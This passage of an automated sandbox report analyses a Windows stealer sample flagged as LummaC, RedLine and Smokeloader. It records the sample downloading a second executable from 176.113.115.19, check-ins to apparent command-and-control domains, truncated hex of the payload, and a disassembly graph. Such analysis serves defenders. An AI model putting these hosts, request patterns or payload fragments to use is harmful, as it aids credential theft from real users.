                                                                                                                                                                                                                                          Dec 17, 2024 09:42:54.051119089 CET1.1.1.1192.168.2.100xe2b8No error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:55.942847967 CET1.1.1.1192.168.2.100x2f9dName error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.202600002 CET1.1.1.1192.168.2.100x8751Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.424360991 CET1.1.1.1192.168.2.100xb33Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.657001019 CET1.1.1.1192.168.2.100x33bfName error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:56.981900930 CET1.1.1.1192.168.2.100x950dName error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.124418020 CET1.1.1.1192.168.2.100x565Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:57.265892029 CET1.1.1.1192.168.2.100x9960No error (0)steamcommunity.com104.121.10.34A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                          • post-to-me.com
                                                                                                                                                                                                                                          • immureprech.biz
                                                                                                                                                                                                                                          • deafeninggeh.biz
                                                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                                                          • 176.113.115.19

                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          0192.168.2.1049715176.113.115.19807736C:\Users\user\Desktop\hpEAJnNwCB.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.682439089 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: ShareScreen
                                                                                                                                                                                                                                          Host: 176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008409977 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 08:42:43 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Tue, 17 Dec 2024 08:30:02 GMT
                                                                                                                                                                                                                                          ETag: "59c00-629731a74cc27"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 367616
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f 13 29 12 0b 72 47 41 0b 72 47 41 0b 72 47 41 b6 3d d1 41 0a 72 47 41 15 20 c3 41 15 72 47 41 15 20 d2 41 1f 72 47 41 15 20 c4 41 65 72 47 41 2c b4 3c 41 0c 72 47 41 0b 72 46 41 7d 72 47 41 15 20 cd 41 0a 72 47 41 15 20 d3 41 0a 72 47 41 15 20 d6 41 0a 72 47 41 52 69 63 68 0b 72 47 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e8 6d 86 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f6 03 00 00 26 3f 00 00 00 00 00 77 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 43 00 00 04 00 00 0a f3 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$O)rGArGArGA=ArGA ArGA ArGA AerGA,<ArGArFA}rGA ArGA ArGA ArGARichrGAPELme&?w@ C)<B.text `.rdata#$@@.data=@p@.rsrcB@@
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008429050 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 24 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 6c 08 00 00 6a 0c 68 e0 25 44 00 e8 97 16 00 00 8b 75 08 85 f6 74 75 83 3d
                                                                                                                                                                                                                                          Data Ascii: %$D;@Duljh%Dutu=uCjYeVYEtVPYYE}u7ujrYVj5TnDDu=DPY[UQeVEPuuu9Et
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008441925 CET448INData Raw: 70 02 c6 46 0c 01 eb 0a 8b 08 89 0e 8b 40 04 89 46 04 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 83 ec 10 33 c9 57 8b f8 3b f1 74 05 33 c0 66 89 06 3b d9 0f 84 79 01 00 00 39 4d 0c 0f 84 70 01 00 00 38 0b 0f 84 68 01 00 00 ff 75 10 8d 4d f0 e8 3f ff ff
                                                                                                                                                                                                                                          Data Ascii: pF@F^]U3W;t3f;y9Mp8huM?Exu.tffEt};E`p/?t~O~23QVjWjpDt'EtM'F*t3fEt(
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008449078 CET1236INData Raw: 55 8b ec 51 83 4d fc ff 8b 45 14 53 8b 5d 0c 56 85 db 74 13 85 c0 75 05 b8 20 6b 44 00 8b 75 08 6a 00 ff 75 10 eb 14 85 c0 75 05 b8 20 6b 44 00 6a 00 6a 01 bb d8 11 44 00 33 f6 8d 4d fc 51 e8 15 fe ff ff 8b 45 fc 83 c4 0c 5e 5b c9 c3 8b ff 55 8b
                                                                                                                                                                                                                                          Data Ascii: UQMES]Vtu kDujuu kDjjD3MQE^[Ujju2]U=,kDuuhYYY]jXh`&D3uEPTDj_}MZf9@u8<@@PEu'f9@ut@v39@M
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008570910 CET1236INData Raw: 6e 6a 18 e8 35 20 00 00 59 8b f8 3b fb 75 0f e8 75 fe ff ff c7 00 0c 00 00 00 33 c0 eb 51 6a 0a e8 59 00 00 00 59 89 5d fc 39 1e 75 2c 68 a0 0f 00 00 57 e8 a7 35 00 00 59 59 85 c0 75 17 57 e8 91 f4 ff ff 59 e8 3f fe ff ff c7 00 0c 00 00 00 89 5d
                                                                                                                                                                                                                                          Data Ascii: nj5 Y;uu3QjYY]9u,hW5YYuWY?]>WvYEEIj(YUEV4AD>uP"YujY6D^]UkU+Pr;r3]UMAVu
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008583069 CET1236INData Raw: 6a 3f 89 45 f8 5a 89 40 08 89 40 04 83 c0 08 4a 75 f4 6a 04 8b fb 68 00 10 00 00 c1 e7 0f 03 79 0c 68 00 80 00 00 57 ff 15 e0 10 44 00 85 c0 75 08 83 c8 ff e9 9d 00 00 00 8d 97 00 70 00 00 89 55 fc 3b fa 77 43 8b ca 2b cf c1 e9 0c 8d 47 10 41 83
                                                                                                                                                                                                                                          Data Ascii: j?EZ@@JujhyhWDupU;wC+GAH@PIuUEOHAJHAdD3GFCENCux!P_^[UMASVuW}
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008595943 CET1236INData Raw: c4 00 00 00 8d 48 44 8b 39 23 55 f8 23 fe 0b d7 75 0e ff 45 fc 8b 91 84 00 00 00 83 c1 04 eb e7 8b 55 fc 8b ca 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f4 8b 4c 90 44 33 ff 23 ce 75 12 8b 8c 90 c4 00 00 00 23 4d f8 6a 20 5f eb 03 03 c9 47 85
                                                                                                                                                                                                                                          Data Ascii: HD9#U#uEUiDMLD3#u#Mj _G}MT+MN?M~j?^;J;Ju\ }&M|8]#\D\Du3M]!,OM|8!]u]M!K]}JzyJzy
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008608103 CET1236INData Raw: c7 00 0c 00 00 00 8b c3 e8 34 fd ff ff c3 8b ff 55 8b ec 57 bf e8 03 00 00 57 ff 15 e8 10 44 00 ff 75 08 ff 15 38 10 44 00 81 c7 e8 03 00 00 81 ff 60 ea 00 00 77 04 85 c0 74 de 5f 5d c3 8b ff 55 8b ec e8 a9 04 00 00 ff 75 08 e8 f6 02 00 00 ff 35
                                                                                                                                                                                                                                          Data Ascii: 4UWWDu8D`wt_]Uu5BDDh]UhD8DthDP\Dtu]UuYuDjQYjnYUVt;ur^]UVu3ut
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008622885 CET1236INData Raw: 34 fd b4 42 44 00 ff 36 e8 a3 2e 00 00 59 50 ff 36 53 ff 15 f0 10 44 00 5f 5e 5b c9 c3 6a 03 e8 7f 2f 00 00 59 83 f8 01 74 15 6a 03 e8 72 2f 00 00 59 85 c0 75 1f 83 3d 00 40 44 00 01 75 16 68 fc 00 00 00 e8 29 fe ff ff 68 ff 00 00 00 e8 1f fe ff
                                                                                                                                                                                                                                          Data Ascii: 4BD6.YP6SD_^[j/Ytjr/Yu=@Duh)hYYUErD]U5rDVYtuYt3@]3]hCDVj^u;}jPxYY`ujV5_YY`ujX^3hCD`
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008635044 CET1236INData Raw: 88 46 04 68 a0 0f 00 00 8d 46 0c 50 e8 aa 1d 00 00 59 59 85 c0 0f 84 c9 00 00 00 ff 46 08 ff 45 e0 43 83 45 e4 04 39 7d e0 7c 93 33 db 8b f3 c1 e6 06 03 35 60 a3 81 00 8b 06 83 f8 ff 74 0b 83 f8 fe 74 06 80 4e 04 80 eb 72 c6 46 04 81 85 db 75 05
                                                                                                                                                                                                                                          Data Ascii: FhFPYYFECE9}|35`ttNrFujXHPDtCt?WDt4>%uN@uNhFPYYt7FN@Cg5@D33@eEU
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.128505945 CET1236INData Raw: ff 35 28 46 44 00 8b f8 e8 91 fe ff ff ff d0 8b f0 85 f6 75 4e 68 14 02 00 00 6a 01 e8 69 03 00 00 8b f0 59 59 85 f6 74 3a 56 ff 35 28 46 44 00 ff 35 0c 73 44 00 e8 e8 fd ff ff 59 ff d0 85 c0 74 18 6a 00 56 e8 c5 fe ff ff 59 59 ff 15 14 11 44 00
                                                                                                                                                                                                                                          Data Ascii: 5(FDuNhjiYYt:V5(FD5sDYtjVYYDNV}Y3WXD_^Vuj>Y^jh0'DuF$tP0YF,tP"YF4tPYF<tPYF@tPYFDtP


                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          0192.168.2.1049709104.21.56.704437736C:\Users\user\Desktop\hpEAJnNwCB.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-17 08:42:41 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: ShareScreen
                                                                                                                                                                                                                                          Host: post-to-me.com
                                                                                                                                                                                                                                          2024-12-17 08:42:42 UTC802INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 08:42:42 GMT
                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lZbluHXwiRYMEXthXU7Zl%2B6YzDRw6%2F8oiruYmGoADtR78yomJ9DKDhrBn62pgesHxBnFXQkGxm7x3XLEdW72y9VnY%2BdwTgeXqt0lN21qyEtSYTG%2F6r839Tp1LmIpdHxlqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8f359f0d0e0542e4-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1562&rtt_var=593&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1831869&cwnd=228&unsent_bytes=0&cid=0f74ebd09569d78b&ts=871&x=0"
                                                                                                                                                                                                                                          2024-12-17 08:42:42 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                          2024-12-17 08:42:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          1192.168.2.104973645.77.249.794437968C:\Users\user\AppData\Local\Temp\91B1.tmp.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-17 08:42:51 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: immureprech.biz
                                                                                                                                                                                                                                          2024-12-17 08:42:51 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-12-17 08:42:52 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 08:42:52 GMT
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          2192.168.2.1049748104.131.68.1804437968C:\Users\user\AppData\Local\Temp\91B1.tmp.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-17 08:42:55 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: deafeninggeh.biz
                                                                                                                                                                                                                                          2024-12-17 08:42:55 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-12-17 08:42:55 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 08:42:55 GMT
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          3192.168.2.1049756104.121.10.344437968C:\Users\user\AppData\Local\Temp\91B1.tmp.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-17 08:42:58 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                                          2024-12-17 08:42:59 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 08:42:59 GMT
                                                                                                                                                                                                                                          Content-Length: 25665
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: sessionid=2ea280fd0ecd38148ff05529; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                          2024-12-17 08:42:59 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                          2024-12-17 08:42:59 UTC11186INData Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                          Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>


                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:03:42:36
                                                                                                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\hpEAJnNwCB.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\hpEAJnNwCB.exe"
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          File size:435'712 bytes
                                                                                                                                                                                                                                          MD5 hash:07A0B87962FBEE50D2ADC913F06A3E3B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                          Start time:03:42:44
                                                                                                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\91B1.tmp.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\91B1.tmp.exe"
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          File size:367'616 bytes
                                                                                                                                                                                                                                          MD5 hash:CC2566EAE03240FFC314E5BEE2DC4D26
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.1390576306.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1759184300.00000000008F8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                          Start time:03:42:59
                                                                                                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 860
                                                                                                                                                                                                                                          Imagebase:0x9b0000
                                                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:2.2%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:3.8%
                                                                                                                                                                                                                                            Signature Coverage:5.6%
                                                                                                                                                                                                                                            Total number of Nodes:762
                                                                                                                                                                                                                                            Total number of Limit Nodes:22
                                                                                                                                                                                                                                            execution_graph 64372 402c04 InternetOpenW 64373 402e55 64372->64373 64376 402c37 Concurrency::details::ResourceManager::DetermineTopology 64372->64376 64393 40f8cf 64373->64393 64375 402e64 64384 42defd 64376->64384 64379 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 64380 402e17 64379->64380 64381 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 64380->64381 64382 402e29 InternetOpenUrlW 64381->64382 64382->64373 64383 402e44 InternetCloseHandle InternetCloseHandle 64382->64383 64383->64373 64385 42df1a 64384->64385 64387 42df0c 64384->64387 64400 42eac9 20 API calls __Wcscoll 64385->64400 64387->64385 64390 42df4a 64387->64390 64389 402e09 64389->64379 64390->64389 64402 42eac9 20 API calls __Wcscoll 64390->64402 64392 42df24 64401 42a59d 26 API calls _Deallocate 64392->64401 64394 40f8d8 64393->64394 64395 40f8da IsProcessorFeaturePresent 64393->64395 64394->64375 64397 40f94d 64395->64397 64403 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64397->64403 64399 40fa30 64399->64375 64400->64392 64401->64389 64402->64392 64403->64399 64404 249003c 64405 2490049 64404->64405 64419 2490e0f SetErrorMode SetErrorMode 64405->64419 64410 2490265 64411 24902ce VirtualProtect 64410->64411 64413 249030b 64411->64413 64412 2490439 VirtualFree 64417 24905f4 LoadLibraryA 64412->64417 64418 24904be 64412->64418 64413->64412 64414 24904e3 LoadLibraryA 64414->64418 64416 24908c7 64417->64416 64418->64414 64418->64417 64420 2490223 64419->64420 64421 2490d90 64420->64421 64422 2490dad 64421->64422 64423 2490dbb GetPEB 64422->64423 64424 2490238 VirtualAlloc 64422->64424 64423->64424 64424->64410 64425 40fc06 64426 40fc12 CallCatchBlock 64425->64426 64454 40fff3 64426->64454 64428 40fc19 64429 40fd6c 64428->64429 64432 40fc43 64428->64432 64475 4104d3 4 API calls 2 library calls 64429->64475 64431 40fd73 64476 42ffc9 28 API calls _Atexit 64431->64476 64441 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64432->64441 64469 42fcee 5 API calls __ExceptionPtr::_RethrowException 64432->64469 64434 40fd79 64477 42ff7b 28 API calls _Atexit 64434->64477 64437 40fd81 64438 40fc5c 64439 40fc62 64438->64439 64470 42fc92 5 API calls __ExceptionPtr::_RethrowException 64438->64470 64445 40fce3 64441->64445 64471 42a366 167 API calls 4 library calls 64441->64471 64443 40fce9 64446 40fcfe 64443->64446 64465 4105ed 64445->64465 64472 410623 GetModuleHandleW 64446->64472 64448 40fd05 64448->64431 64449 40fd09 64448->64449 64450 40fd12 64449->64450 64473 42ff6c 28 API calls _Atexit 64449->64473 64474 410182 13 API calls 2 library calls 64450->64474 64453 40fd1a 64453->64439 64455 40fffc 64454->64455 64478 41077b IsProcessorFeaturePresent 64455->64478 64457 410008 64479 428827 10 API calls 3 library calls 64457->64479 64459 410011 64459->64428 64460 41000d 64460->64459 64480 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64460->64480 64462 41001a 64463 410028 64462->64463 64481 428850 8 API calls 3 library calls 